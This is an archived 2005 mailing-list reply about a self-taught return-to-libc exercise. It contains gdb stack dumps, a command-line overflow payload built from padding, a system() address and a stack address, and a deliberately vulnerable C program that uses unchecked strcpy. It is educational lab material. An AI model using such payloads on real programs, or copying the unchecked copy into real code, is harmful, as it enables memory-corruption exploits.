From mboxrd@z Thu Jan  1 00:00:00 1970
Return-Path: <wmcdona89@hotmail.com>
Message-ID: <BAY24-F27322873FA47DCEDBB53C6B3870@phx.gbl>
X-Originating-IP: [68.62.6.61]
X-Originating-Email: [wmcdona89@hotmail.com]
X-Sender: wmcdona89@hotmail.com
In-Reply-To: <20050121233305.GP1188@osdn.org.ua>
From: "Aaron McDonald" <wmcdona89@hotmail.com>
To: community-en@altlinux.org
Subject: Re: [Comm-en] System call via buffer overflow not working
Date: Wed, 26 Jan 2005 00:39:21 -0500
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
X-OriginalArrivalTime: 26 Jan 2005 05:40:00.0943 (UTC)
	FILETIME=[7A5F1BF0:01C50369]
Cc: 
X-BeenThere: community-en@altlinux.org
X-Mailman-Version: 2.1.5
Precedence: list
Reply-To: community-en@altlinux.org
List-Id: "Mailing list for ALT Linux users \(in English only\)"
	<community-en.altlinux.org>
List-Unsubscribe: <https://lists.altlinux.org/mailman/listinfo/community-en>, 
	<mailto:community-en-request@altlinux.org?subject=unsubscribe>
List-Archive: <http://lists.altlinux.org/pipermail/community-en>
List-Post: <mailto:community-en@altlinux.org>
List-Help: <mailto:community-en-request@altlinux.org?subject=help>
List-Subscribe: <https://lists.altlinux.org/mailman/listinfo/community-en>,
	<mailto:community-en-request@altlinux.org?subject=subscribe>
X-List-Received-Date: Wed, 26 Jan 2005 05:40:03 -0000
Archived-At: <http://lore.altlinux.org/community-en/BAY24-F27322873FA47DCEDBB53C6B3870@phx.gbl/>
List-Archive: <http://lore.altlinux.org/community-en/>
List-Post: <mailto:community-en@lists.altlinux.org>

Well, this has been quite the learning experience. You've helped me to 
realize that \x00 is really just NULL and that printf in C ignores any 
characters specified after \x00. The program vulner1.c was only receiving 
the bytes before the \x00 which were the system() function address. This now 
explains why the system() function was being called with an invalid 
parameter. I've probably spent too much time on this issue but I've 
satisfied my curiosity and I learned how to analyze memory using gdb. I've 
included some gdb details below.

Thanks for the responses on this,
Aaron

----------------------------------------------------------------------------------------------------------------------------------------

//Here's what the stack frame looks like
(gdb) info f
Stack level 0, frame at 0xbffffa00:
eip = 0x80484c6 in main (vulner3.c:21); saved eip 0x157ee0
source language c.
Arglist at 0xbffff9f8, args: argc=2, argv=0xbffffa54
Locals at 0xbffff9f8, Previous frame's sp is 0xbffffa00
Saved registers:
  ebp at 0xbffff9f8, eip at 0xbffff9fc
(gdb) x /4xw 0xbffff9f8
//This shows that none of the memory after the system() function address 
(0x00157ee0) is overwritten
0xbffff9f8:	0x41414141	0x00157ee0	0x00000002	0xbffffa54


//Here's an alternative program that is vulnerable to the return-to-libc 
exploit even when the system() function address contains \x00

./vulner2 $(perl -e 'print "A"x524')$(printf "\xe0\x7e\x15 
\x41\x41\x41\x41\x73\xfb\xff\xbf")

//vulner2.c
#include <stdio.h>

int main(int argc, char *argv[])
{
        char names[512];  //array to hold all the names
        int num_params=argc;
        char **params = argv;
        char *index = names;
        int i;

        if(argc < 2)
        {
                printf("Usage: %s name [name]\n", argv[0]);
                exit(0);
        }

	//copy all the parameters into the names array
        for(i=1; i < num_params; i++) {
                strcpy(index, params[i]);
                index+=strlen(params[i]);
                *(index++)='\0';
        }
        *(index) = '\0';

        index = names;

        while(strlen(index) != 0) {
                printf("Name is: %s\n", index);
                index+=strlen(index) + 1;
        }

        return 0;
}